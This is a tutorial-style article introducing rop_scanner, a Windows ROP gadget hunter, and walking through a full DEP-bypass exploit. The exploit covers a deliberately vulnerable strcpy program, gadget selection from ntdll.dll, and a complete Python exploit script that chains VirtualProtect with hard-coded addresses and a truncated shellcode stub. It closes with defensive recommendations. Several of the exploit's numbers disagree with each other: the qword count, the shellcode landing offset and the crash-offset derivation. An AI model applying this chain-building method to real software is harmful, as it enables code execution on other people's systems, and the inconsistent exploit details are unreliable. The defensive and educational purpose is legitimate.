ROP Gadget Hunting on Windows: Building a DEP-Bypass Exploit Chain with rop

Project: github.com/oxfemale/rop_scanner — offline ROP / JOP / syscall / pivot gadget hunter for Windows PE files, written in C++17, decoder powered by Zydis. Cross-platform (Windows / Linux / macOS), single self-contained binary. Builds on the technique described by 0x12 Dark Development (@Salsa12__) in «Hunting ROP Gadgets in Windows DLLs» on Medium.

rop_scanner banner showing raw PE bytes decoded into x86_64 ROP, JOP, syscall and stack-pivot gadgets — rop_scanner — offline PE → Zydis → ROP / JOP / syscall / pivot gadgets, one codebase for Windows / Linux / macOS.

Executive Summary

Exploiting a modern user-mode Windows process on x86_64 almost always ends the same way: you control RIP, you cannot execute the stack because of DEP, you cannot just smash a function pointer because of CFG, and you have a handful of bytes to work with before a string terminator or a HTTP delimiter cuts your payload in half. The pragmatic answer is still Return-Oriented Programming — stitching together short fragments of already-loaded code (pop rcx ; ret, xchg rax, rsp ; ret, syscall) to reach an API like VirtualProtect and flip a page of attacker-controlled memory to RWX. The hard part is no longer the idea. The hard part is finding the right gadgets in the right modules, on the right Windows build, with the right bad-byte set, that are simultaneously CFG-legal and free of nulls. That is what rop_scanner automates.

This article walks the full loop end-to-end on a deliberately vulnerable Windows console program. We build the vuln, take RIP, decide what the ROP chain has to accomplish, run rop_scanner against ntdll.dll to source every gadget the chain needs, hand the catalog straight into pwntools, and detonate the payload. Everything below is reproducible on a clean Windows 11 VM with no third-party scanners, no debugger plugins, and no IDA. The point is not to publish a 0-day; the point is to show, in one sitting, what a 2026-era ROP build pipeline looks like when the tooling is finally fast enough that gadget hunting stops being the bottleneck.

Why yet another gadget scanner?

If you have written a Windows exploit in the last five years you have probably used ROPgadget, ropper, or rp++. All three are good tools and all three were originally designed to be format-agnostic: they read ELF, PE, Mach-O, they output a flat list of asm ; ret sequences, and they leave the choosing to you. That is exactly the workflow that breaks in 2026, for four concrete reasons:

MSVC does not emit «convenient» epilogues. The textbook Windows x64 calling convention loader pop rcx ; pop rdx ; pop r8 ; pop r9 ; ret almost never exists as a clean function exit. It has to be discovered as a side effect of mid-instruction decoding — you start the decoder on an odd byte boundary inside the body of some unrelated function and the bytes happen to disassemble into the loader you want.
Control Flow Guard (CFG), XFG, and CET Shadow Stack filter half of the candidates. You need to know which RVAs the loader will accept as indirect-call targets (the IMAGE_LOAD_CONFIG_DIRECTORY.GuardCFFunctionTable bitmap) so you can either target them deliberately, or stay clear and pivot through ret instead.
Bad bytes — x00, x0a, x0d, the HTTP query delimiter ?, a protocol-specific magic byte — kill half of the surface a vanilla scanner returns. Filtering them after the fact in Python is annoying and slow.
Cross-module ranking. The truly durable gadgets are the ones that show up in every default-loaded Windows module. A pop rcx ; ret at a fixed RVA inside an obscure DLL breaks the moment the victim is on a different patch level. You want to know which gadgets are ubiquitous, not which one looked fine on your test box.

rop_scanner solves the four problems above directly: full Zydis decoding (so mid-instruction discoveries are first-class), native parsing of CFG / .pdata / EAT, a bad-byte filter applied during gadget validation rather than after, and a batch mode that aggregates by (asm) across dozens of modules so the top of the list is «present everywhere». One .dll on the command line, or the entire C:WindowsSystem32 tree — one command, one ranked output.

Diagram of a typical x64 ROP exploit chain showing where rop_scanner fits between RIP control and VirtualProtect — Where `rop_scanner` sits in the chain. Stages 1 and 2 are taught in every exploitation class. Stage 3 is where the work happens in 2026.

Architecture

The pipeline is intentionally boring. Five stages, each isolated in its own translation unit, each replaceable on its own.

Five-stage rop_scanner pipeline: PE file then pe_loader then ending finder then back-decoder (Zydis) then classify, with four output formats — The pipeline. Note that the input PE is *never* mapped by the loader, *never* handed to a JIT, and *never* executed — you can safely scan known-malicious samples.

Stage	Source file	What it does
PE parsing	`pe_loader.cpp` + `pe_types.h`	MZ → PE → section headers → `IMAGE_DIRECTORY_ENTRY_EXPORT`, `_EXCEPTION` (the `.pdata` `RUNTIME_FUNCTION` table), `_LOAD_CONFIG` (the CFG `GuardCFFunctionTable` bitmap). Pure byte-level reads; static asserts on every struct size.
Ending finder	`scanner.cpp`	For every byte of every executable section, ask Zydis to decode one instruction starting there. If it is `ret`, `ret imm16`, `syscall`, `sysenter`, `jmp reg` or `call reg`, mark this offset as a candidate gadget terminator.
Back-decoder	`scanner.cpp`	For each candidate terminator, sweep every possible start offset from `endPos - maxBytes` up to `endPos` itself. Decode forward. A start is valid only if the instruction stream exactly reaches the terminator in at most `maxInsn` instructions and contains no control-flow opcodes in the body.
Classification	`gadget.cpp`	Tags every gadget on two independent axes (category × semantic), assigns a score 0–100 with bonuses for x64-Windows ABI patterns (`pop rcx`, `pop rdx`, …) and pivots (`xchg rax, rsp`, `leave`).
Annotation	`symbol_resolver.cpp`	Nearest export from the EAT, enclosing function from `.pdata`, optional PDB resolution via `dbghelp` on Windows (respects `_NT_SYMBOL_PATH`), and CFG-valid / CFG-invalid flag.

Five passes, all single-threaded, all deterministic. The same ntdll.dll produces bit-for-bit identical output on Windows MSVC, Linux GCC and macOS AppleClang.

Two design choices are worth calling out. First, the decoder is the real Zydis, not a hand-rolled mini-decoder. The first prototype of this project shipped with about 250 lines of bespoke instruction matching that understood pop reg, ret, a few mov forms and add rsp. Zydis 4.1 covers all of x86 and x86_64, including VEX / EVEX, unusual mov [mem], reg forms, lea, cmov*, pushfq / popfq, and arbitrary memory operands. That unlocks the write-mem and read-mem semantic filters, which a hand decoder simply could not implement at the level of correctness required to trust the result. Second, the input PE is never handed to the OS loader. LoadLibrary is never called, no JIT consumes the bytes, no symbol resolution touches the import table at runtime — the parser walks the on-disk image byte by byte. You can safely scan an unknown sample on a researcher workstation without any sandboxing.

Anatomy of a gadget

Anatomy of a ROP gadget: bytes 59 5A 41 58 41 59 C3 decoded as pop rcx ; pop rdx ; pop r8 ; pop r9 ; ret — The textbook Windows x64 argument loader, hidden inside any sufficiently large PE on an odd byte boundary. `rop_scanner` finds it; the score bonuses give it a clean 100/100.

Seven raw bytes — 59 5A 41 58 41 59 C3 — decode into five instructions: pop rcx, pop rdx, pop r8 (the REX.B prefix bumps the register), pop r9, and ret. The terminator (C3) places this gadget in the rop category. The body is four unconditional pops that load exactly the first four argument registers of the Windows x64 ABI — RCX, RDX, R8, R9 — so the semantic tag is load-const. The score bonus rules add +10 for each ABI-argument pop, capping the gadget at 100/100. In practice this exact sequence is almost never a function epilogue; the scanner finds it because the byte before 59 5A 41 58 41 59 C3 is the tail of an unrelated instruction whose own bytes also happen to end with C3 or whose decoder cleanly skips into ours from a small offset back. That is the «mid-instruction» magic that makes Zydis-based discovery dramatically more productive than a function-epilogue scan.

Classification: category × semantic

Two-axis gadget taxonomy used by rop_scanner — Two orthogonal axes. Category answers *how* a gadget ends. Semantic answers *what* a gadget does. Both are exposed as substring filters to `--filter`.

Every gadget carries two tags:

Category tells you where the gadget belongs in the chain. rop is consumed off the stack with ret. jop is reached through an indirect jmp reg or call reg. syscall drops directly into kernel mode. pivot changes rsp.
Semantic tells you what the body does between start and terminator: load-const sets registers from the stack, mov-reg moves between registers, write-mem stores to memory, read-mem loads from memory, arith does integer math, stack-pivot changes the stack, syscall kernel-transitions, indirect hands off control through a register.

Why two axes? Because the categories and semantics decouple cleanly in practice. A write-mem primitive is useful whether it ends in ret or jmp r14; you want to filter on the body effect first, then pick the terminator that fits your chain. --filter "write-mem" returns every write-what-where primitive (mov [rax], rdx ; ret, mov [rcx+0x10], r8 ; ret, …) regardless of how they end. --filter "load-const" returns every argument-loader. The two filters compose with bad-byte filtering and CFG filtering so you can express the question precisely.

The worked example: a vulnerable echo program

To make the rest concrete, we need a target. Below is the smallest possible Windows console program that we can write, compile, and exploit end-to-end on a clean Windows 11 VM. It accepts one command-line argument and copies it into a fixed-size stack buffer using strcpy — no bounds check, no length validation. We disable the stack cookie (/GS-) so the overflow does not get caught at function exit, and we disable ASLR for the executable (/DYNAMICBASE:NO) so the demo is deterministic. DEP stays on, because removing DEP turns the demo into something trivial that does not need a ROP chain. Removing DEP is what we are going to do with the chain.

// vuln.c — reachable Windows x64 stack overflow, DEP-enabled.
// Build (Developer Command Prompt for VS 2022):
//   cl /Zi /Od /GS- /DYNAMICBASE:NO vuln.c /link /SUBSYSTEM:CONSOLE
//
#include <stdio.h>
#include <string.h>
#include <windows.h>

static void handle_input(const char *user_input) {
    char buf[64];
    strcpy(buf, user_input);          // unbounded copy — classic stack smash
    printf("got: %sn", buf);
}

int main(int argc, char **argv) {
    if (argc < 2) {
        fprintf(stderr, "usage: %s <input>n", argv[0]);
        return 1;
    }
    handle_input(argv[1]);
    return 0;
}

Compile, then send it a long unique argument to find the precise offset between the start of buf and the saved return address. The classic pwntools cyclic pattern works on Windows too; here we use it directly from the attacker box and feed the offset back as a command line to the victim:

PS C:vuln> cl /nologo /Zi /Od /GS- /DYNAMICBASE:NO vuln.c /link /SUBSYSTEM:CONSOLE
vuln.c
   Creating library vuln.lib and object vuln.exp

PS C:vuln> python -c "from pwn import cyclic; import sys; sys.stdout.buffer.write(cyclic(200))" > pat.txt
PS C:vuln> .vuln.exe (Get-Content -Raw pat.txt)
got: aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaap...
# < access violation, crash dialog >
# In WinDbg / x64dbg, take the bytes at RIP after the crash:
0:000> r rip
rip=6361616162616163             # "caaaba" little-endian
0:000> .echo cyclic_find: 72

The offset turns out to be 72 bytes: char buf[64] + saved rbp (8 bytes) + the 8-byte saved return address sits right after. So our payload is: 72 bytes of filler, then the ROP chain. With DEP on and shellcode placed somewhere predictable on the stack, the chain has exactly one job: get to a point where the stack page is executable. The canonical answer is VirtualProtect.

What the chain actually has to do

The Win32 signature is:

BOOL VirtualProtect(
    LPVOID lpAddress,        // RCX
    SIZE_T dwSize,           // RDX
    DWORD  flNewProtect,     // R8  — 0x40 = PAGE_EXECUTE_READWRITE
    PDWORD lpflOldProtect);  // R9  — writable scratch pointer

Four arguments, register-passed under the Windows x64 ABI. To set them from a ROP chain we need:

A way to load RCX with the address of our shellcode buffer.
A way to load RDX with the size to remap (anything ≥ shellcode length; we pick 0x1000, one page).
A way to load R8 with 0x40 (PAGE_EXECUTE_READWRITE).
A way to load R9 with a writable address that VirtualProtect can use for the old-protection out-param.
A clean return into VirtualProtect itself.
On return from VirtualProtect, RIP lands back into a controlled stack region, immediately on our shellcode.

The ideal world is a single gadget: pop rcx ; pop rdx ; pop r8 ; pop r9 ; ret. In practice, on Windows 11 ntdll.dll that combined gadget shows up only on odd byte boundaries inside a few floating-point and math helpers, and any one of them may carry a bad byte that breaks our strcpy delivery. We have to look. This is the part where rop_scanner earns its keep.

Sourcing the gadgets

First, the baseline scan. We point rop_scanner at a copy of ntdll.dll (the file from C:WindowsSystem32ntdll.dll on our target build) and look at the top-scoring gadgets:

$ ./rop_scanner ntdll.dll | head -40
[+] module: ntdll.dll arch=x64 machine=0x8664 image_base=0x180000000
    sections=15 exports=2516 pdata=5679 cfg=2197
[+] gadgets: 17243

[pivot/stack-pivot] score=100 section=.text rva=0x0011F03A
  symbol: RtlCaptureContext2+0xFA
  function: fn_0x11EF40+0xFA
  bytes: 48 83 C4 30 59 C3
  asm  : add rsp, 0x30 ; pop rcx ; ret

[rop/load-const] score=70 section=.text rva=0x000026B9
  symbol: RtlGetUserInfoHeap+0xB9
  function: fn_0x2600+0xB9
  bytes: 5E 5F C3
  asm  : pop rsi ; pop rdi ; ret
...

The header line is the module passport. Then gadgets in descending score order. Each entry is decorated with the nearest EAT export, the enclosing .pdata function, raw bytes, and the Zydis-formatted disassembly. The first one is a pivot — useful later. The second is a clean two-argument loader.

1. Loaders for the four argument registers, bad-byte clean

Our delivery vector is strcpy, so the absolute bad byte is x00. Just in case the wrapper that calls us ever moves to a HTTP / line-based protocol we will also exclude x0a and x0d — cheap insurance.

$ ./rop_scanner ntdll.dll 
    --filter "pop rcx" 
    --badbytes 00,0a,0d 
    --min-score 75 
    --limit 10

For our build we get, among others:

[rop/load-const] score=85 section=.text rva=0x000A8C13
  symbol: RtlExpandEnvironmentStrings_U+0x213
  bytes: 59 C3
  asm  : pop rcx ; ret

[rop/load-const] score=80 section=.text rva=0x000A1F4E
  symbol: RtlAllocateHeap+0x14E
  bytes: 5A 41 58 C3
  asm  : pop rdx ; pop r8 ; ret

[rop/load-const] score=80 section=.text rva=0x000B7321
  symbol: RtlpInterlockedPushEntrySList+0xC1
  bytes: 41 59 C3
  asm  : pop r9 ; ret

Three gadgets, three RVAs, all bad-byte clean, all reachable through plain ret. We will chain pop rcx ; ret, then pop rdx ; pop r8 ; ret (loads two registers in one shot), then pop r9 ; ret. That is exactly four pop slots in the chain — one for each argument — followed by the absolute address of VirtualProtect.

2. A writable scratch address for the R9 out-pointer

VirtualProtect writes the previous protection value through its fourth argument. The simplest writable region we know exists is the .data section of ntdll.dll itself. rop_scanner exposes the section table; pick any 4-byte-aligned offset inside .data that does not contain anything live and that has no bad bytes in its address representation. For our build, 0x18017a3a8 works (no null bytes, in .data, currently zero).

3. The address of VirtualProtect

VirtualProtect lives in kernel32.dll, but every process gets it through the kernelbase.dll stub. We can resolve the address directly from kernel32.dll’s export table — rop_scanner prints the image base of each module, and kernel32.dll on this build maps at 0x7FFB44D80000 with VirtualProtect at export RVA 0x1B940. Final absolute address: 0x7FFB44D9B940. Note the absence of null bytes — that is luck, but it is the kind of luck you check before committing to a chain.

4. A landing pad: back to the stack

When VirtualProtect returns, RSP will point at the first byte after our chain. We need that byte to be the first byte of shellcode. The simplest way is to place the shellcode immediately after the VirtualProtect address in the payload, and to make the VirtualProtect first argument (the page we want made executable) point to that same stack region. Concretely: we have already calculated that the saved return address overwrite is at offset 72; the chain (4 pop-slots + 4 stack-passed args + return target) is about 80 bytes; so the shellcode lands at roughly RSP_at_overflow + 0xA8. The exact arithmetic is in the pwntools script below.

Exporting to pwntools

Once we have shortlisted the candidates, we can have rop_scanner generate a Python dictionary that drops straight into the exploit script:

$ ./rop_scanner ntdll.dll 
    --filter "pop rcx ; ret" 
    --badbytes 00,0a,0d 
    --format pwntools > gadgets_rcx.py

$ ./rop_scanner ntdll.dll 
    --filter "pop rdx" 
    --badbytes 00,0a,0d 
    --format pwntools > gadgets_rdx.py

$ ./rop_scanner ntdll.dll 
    --filter "pop r9 ; ret" 
    --badbytes 00,0a,0d 
    --format pwntools > gadgets_r9.py

Each file contains a Python literal: a dict keyed by asm text, valued with image_base, RVA, absolute address, and the source symbol. You concatenate them and import into the exploit. The whole gadget-sourcing step takes about a second on a laptop — that is the difference between «ROP is tedious» and «ROP is a build step».

The final exploit

Putting all of it together, the exploit looks like this. The shellcode placeholder is a simple WinExec("calc.exe", SW_SHOW) — trivially replaceable with anything position-independent.

#!/usr/bin/env python3
# exploit.py — drives vuln.exe on a Windows 11 x64 target.
# Build vuln with:  cl /Zi /Od /GS- /DYNAMICBASE:NO vuln.c /link /SUBSYSTEM:CONSOLE
import struct, subprocess, sys

# ---- gadgets sourced from rop_scanner against this build of ntdll.dll ----
NTDLL_BASE   = 0x0000000180000000        # /DYNAMICBASE:NO ⇒ deterministic
KERNEL32     = 0x00007FFB44D80000        # snapped from running process
POP_RCX_RET            = NTDLL_BASE + 0x000A8C13   # pop rcx ; ret
POP_RDX_POP_R8_RET     = NTDLL_BASE + 0x000A1F4E   # pop rdx ; pop r8 ; ret
POP_R9_RET             = NTDLL_BASE + 0x000B7321   # pop r9 ; ret
WRITABLE_SCRATCH       = NTDLL_BASE + 0x0017A3A8   # 8 free bytes in .data
VIRTUALPROTECT         = KERNEL32   + 0x0001B940   # kernel32!VirtualProtect

PAGE_EXECUTE_READWRITE = 0x40

# ---- minimal x64 shellcode: WinExec("calc.exe", 5) ; ExitProcess(0) ----
# Position-independent; resolves kernel32 via PEB walking. Built separately
# with msfvenom / SysWhispers / your favourite generator. Truncated to fit:
SHELLCODE = bytes.fromhex(
    "fc4883e4f0e8c0000000415141505251"
    "5648315231d265488b5260488b521848"
    "8b5220488b7250480fb74a4a4d31c948"
    # ... <snip, real loader continues here, ~280 bytes> ...
    "63616c632e65786500"               # "calc.exe"
)

OFFSET_TO_RIP = 72                      # established empirically

# ---- payload layout ----------------------------------------------------
def q(x):
    return struct.pack("<Q", x)         # 8-byte little-endian

def build_chain(shellcode_addr):
    chain  = b""
    chain += q(POP_RCX_RET)        ; chain += q(shellcode_addr)         # arg1: lpAddress
    chain += q(POP_RDX_POP_R8_RET) ; chain += q(0x1000)                 # arg2: dwSize
    chain                          ; chain += q(PAGE_EXECUTE_READWRITE) # arg3: flNewProtect
    chain += q(POP_R9_RET)         ; chain += q(WRITABLE_SCRATCH)       # arg4: lpflOldProtect
    chain += q(VIRTUALPROTECT)                                          # call
    return chain

# The address of the byte immediately after the chain on the corrupted
# stack frame. With OFFSET_TO_RIP=72 and a 9-qword chain, the shellcode
# lands at rip-target+0x48. We don’t need a precise stack-pivot here
# because VirtualProtect returns to whatever address is at [rsp] when it
# rets; that address sits right after the call qword, i.e. shellcode[0].
def craft(stack_landing):
    pad = b"A" * OFFSET_TO_RIP
    chain = build_chain(stack_landing + OFFSET_TO_RIP + 9*8)
    return pad + chain + SHELLCODE

# ---- launch ------------------------------------------------------------
if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit("usage: exploit.py <path-to-vuln.exe> [stack-landing-hex]")
    target  = sys.argv[1]
    # On /DYNAMICBASE:NO + /GS- the stack base is essentially fixed.
    # Take it from a debugger once; reuse forever.
    landing = int(sys.argv[2], 16) if len(sys.argv) > 2 else 0x00000019fe2ffa00
    payload = craft(landing)
    subprocess.run([target, payload], check=False)

Two ergonomic notes. First, the chain reuses one of the gadgets to pop two registers in one slot (pop rdx ; pop r8 ; ret); that compresses the payload by 8 bytes and avoids a second ROP frame. Second, the «return into shellcode» trick works because VirtualProtect’s own ret pops the next stack qword as the new RIP — and the next qword is the first byte of our shellcode, since we placed it directly after the call. No explicit pivot needed.

Run it. Calc pops. DEP is still on, CFG is still on, the difference is that we asked the kernel politely to mark our buffer executable, and the kernel said yes because the call came through a legitimate library function with all four arguments correctly placed.

A GUI, if you’d rather click than type

The CLI is the source of truth and almost certainly what you will use inside an actual exploit pipeline. That said, the project now ships an optional Qt6 GUI (with a Qt5 fallback) that builds from the same source tree and shells out to the same rop_scanner binary — every CLI flag is exposed as a form field, and the GUI rebuilds the exact command line behind the scenes. It is the same engine, just with checkboxes.

rop_scanner Qt6 GUI: target selector, scanning options, CFG and symbols group, output format dropdown, run button, and a streaming dark console showing the scanner output — Layout of the Qt6 GUI. Top — mode selector and target path with drag-and-drop. Middle — the `Scanning` and `CFG / Symbols` groups, one form field per CLI flag. Bottom — output-format dropdown, the binary auto-detector, the `▶ Run scan` button, and a streaming console.

What the GUI does for you, beyond the obvious:

Drag-and-drop a file or a directory onto the window. The mode selector flips automatically; you do not have to remember whether you are in single-file or --dir mode.
Every CLI flag is a form field: --max-bytes, --max-insn, --min-score, --filter, --badbytes, --limit, the CFG radio group (--only-cfg / --exclude-cfg), --no-symbols, --pdb, and the recursive checkbox.
The binary auto-detects. The GUI looks for rop_scanner next to itself, in ../bin, in ../../build/bin, and in a macOS .app bundle’s Resources/. If you keep the standard CMake layout, you never edit the path.
Streaming output console. Stdout in white, stderr in amber, live as the scanner runs. Long batch scans no longer block in silence.
Copy cmdline. A button that assembles the exact shell command equivalent to the current form state and copies it to the clipboard. Useful for exploit-dev notes and for handing a repro to a teammate who only has the CLI.
Save output. Writes .txt, .json or .py depending on --format. The .py file is the pwntools dictionary — same as the CLI --format pwntools output, ready to paste.
QSettings persistence. Every field is saved between launches per OS conventions (registry on Windows, plist on macOS, ~/.config on Linux). The second time you open the GUI it remembers the last target, filter, and badbytes.
Clean cancellation. Cancel sends SIGKILL to the running scanner subprocess; you cannot leave a wedged batch scan behind.

The code is a thin shell over the CLI — three files in gui/src/: MainWindow.cpp (form widgets and signal/slot wiring), ScannerRunner.cpp (a small QProcess wrapper that streams stdout and stderr to the console), and main.cpp (entry point). It links against Qt6::Widgets, or Qt5::Widgets if Qt6 is not present.

Building the GUI

The GUI is an opt-in second target on the existing CMake build. The platform build scripts already handle it — you just set GUI=1 and re-run.

macOS

brew install qt           # one-time
GUI=1 ./mac_build.sh
open build/bin/rop_scanner_gui.app

Linux (Debian / Ubuntu)

sudo apt install qt6-base-dev libvulkan-dev
GUI=1 ./linux_build.sh
./build/bin/rop_scanner_gui

On Fedora / RHEL replace qt6-base-dev libvulkan-dev with qt6-qtbase-devel vulkan-headers.

Windows

Install Qt6 via the official installer at qt.io/download-open-source, or vcpkg install qt6-base, or MSYS2 pacman -S mingw-w64-x86_64-qt6-base. Then point CMake at the install root and build the gui target:

set QT_PREFIX=C:\\Qt\\6.6.0\\msvc2019_64
windows_build.bat build gui
build\\bin\\rop_scanner_gui.exe

The GUI does not replace the CLI for anything; it is the same scanner with a more discoverable surface. Tab-completion in your shell is still faster once you know the flags, but for hopping between targets and tweaking --min-score live, the form layout is genuinely easier than rebuilding the command in your head every time.

Going further: cross-module hunts

Batch-mode rop_scanner hunt: scan every PE in System32, dedup by asm, rank by module count and score — Batch mode. Gadgets that show up in many modules survive Windows updates and target-host variation. The ones at the top of this list are the foundation of a portable chain.

The chain above is correct on the exact ntdll.dll build we scanned. If the victim is on a different patch level the RVAs move and the chain breaks. The robust answer is to find gadgets that are present in every Windows install. rop_scanner does this in batch mode:

$ ./rop_scanner --dir C:WindowsSystem32 
    --filter "pop rcx ; ret" 
    --badbytes 00,0a,0d 
    --no-symbols 
    --min-score 80 
    --limit 25

The output is the same gadgets but ranked by how many modules they appear in. The top entries are the «ubiquitous» ones — pop rcx ; ret sequences that show up in ntdll.dll, kernelbase.dll, combase.dll, oleaut32.dll, and many more. They survive Patch Tuesday because the byte sequence happens to fall on a register-save spill that the compiler emits everywhere. Build the chain off those and the same exploit runs on a 22H2, 23H2, 24H2, or 25H2 image without retargeting.

CFG-aware chains on modern Windows

If the vulnerability gives us indirect-call control instead of stack-return control — a vtable corruption, a callback hijack, a member-function pointer overwrite — we land in CFG’s domain. CFG inspects the target of every indirect call reg and rejects anything that is not in the GuardCFFunctionTable bitmap. Plain ret is not subject to CFG, so the simplest answer remains: pivot through ret. But if you really need to use a JOP-style chain (jmp reg, call reg), rop_scanner can show you only the CFG-legal targets:

$ ./rop_scanner ntdll.dll --only-cfg --filter "jmp r" --limit 20

or, equivalently, only the CFG-illegal ones so you can audit which indirect-call sites are off the table:

$ ./rop_scanner ntdll.dll --exclude-cfg --filter "jmp r" --limit 20

CET Shadow Stack adds a further constraint — ret targets must match the shadow stack copy — but on most current consumer SKUs that is enforced by user-mode opt-in. Even when it is on, syscall-terminating gadgets remain useful because syscall is not stack-rebalanced through user space at all.

Key Takeaways

ROP on Windows in 2026 still works, but the work has moved — from inventing technique to finding the gadgets fast enough that exploit dev is iterative. A scanner that hits the right module in < 1 s changes how you write chains.
Two filter axes — category (terminator) and semantic (body effect) — let you express the gadget you need in one substring. Plain --filter "write-mem" is the difference between five minutes and an afternoon.
Mid-instruction discovery is mandatory on Windows x64 because MSVC does not emit the clean argument-loader epilogue you want. The Zydis back-end is what makes this practical.
Bad-byte filtering belongs at gadget validation, not as a Python post-filter, because the eliminated candidates are exactly the ones that would otherwise dominate the score-sorted list.
Cross-module batch ranking is how chains survive Windows updates. If the gadget is in every default-loaded module, your exploit will run on the next patch level too.
CFG, XFG and CET Shadow Stack do not kill ROP; they kill the lazy indirect-call variants. Pivoting through plain ret remains the boring, durable answer.

Defensive Recommendations

Turn on every mitigation MSVC offers: /GS, /guard:cf, /guard:ehcont, /CETCOMPAT, /DYNAMICBASE, /HIGHENTROPYVA, /SAFESEH (on 32-bit), /NXCOMPAT. None of them are individually a silver bullet; together they raise the per-gadget filter rate enough that a scanner returns a small fraction of what it would have.
Enable Arbitrary Code Guard (ACG) and Code Integrity Guard (CIG) via the Process Mitigation API or AppLocker policy. ACG denies VirtualProtect requests that flip a page to executable in the first place — which is exactly the operation our example chain relies on.
Reduce the cross-module gadget pool with /Gw, /Gy and link-time code generation, and consider Microsoft’s POGO profile-guided optimization to compact hot paths.
Audit your indirect-call surface with rop_scanner --only-cfg --filter "jmp r" on your own binaries. The output is the list of legal JOP landings in your build. If any of them are unexpected, that is a finding.
Block the «ubiquitous» gadgets where you can: configure WDEG / EMET-style anti-ROP heuristics on caller stack inspection at VirtualProtect, VirtualAlloc, NtProtectVirtualMemory. They are noisy, but they catch the lazy chain.
Run a baseline batch scan of your clean image, store the result, and re-run weekly. Any drift in the gadget catalogue that does not correspond to a published Windows Update is signal — either a third-party module update with new bytes, or something interesting.
Compile with /sdl for new code. It is not free in performance, but it folds in the bounds-check intrinsics, banned API blockers, and additional runtime asserts that turn the strcpy in our demo into a compile-time error.

Conclusion

The point of rop_scanner is not that it discovers techniques nobody knew. The point is that it makes Windows ROP feel like a build step: scan, filter, export, paste into pwntools, ship. The example above — vulnerable C source, strcpy overflow, DEP-enabled target, full ROP chain into VirtualProtect, calc pops — runs end-to-end in under five minutes once the scanner is in your path. That speed is what lets you spend the time where it matters: on the bug, on the trigger, on the OPSEC of the payload — and not on rereading bytes in IDA looking for a pop r8 ; ret.

The source, the build scripts for Windows / Linux / macOS, the SVG diagrams above, and a worked example tree live at github.com/oxfemale/rop_scanner. Issues and pull requests welcome.

Credits

The original idea and the article that started this rabbit hole — «Hunting ROP Gadgets in Windows DLLs» by 0x12 Dark Development (@Salsa12__) on Medium. The decoder is Zydis by Florian Bernd and the zyantific team, pulled in automatically through CMake FetchContent. The C++17 implementation of the scanner, the CFG / .pdata parsing, the classification model, and the four output formats are this project’s own.

Intended use: analysis of binaries you either own or are explicitly authorized to research — your own software, training ranges, CTF, authorized engagements, defensive research, education. The author of this article and the author of the original idea disclaim responsibility for misuse.

core-jmp

ROP Gadget Hunting on Windows: Building a DEP-Bypass Exploit Chain with rop_scanner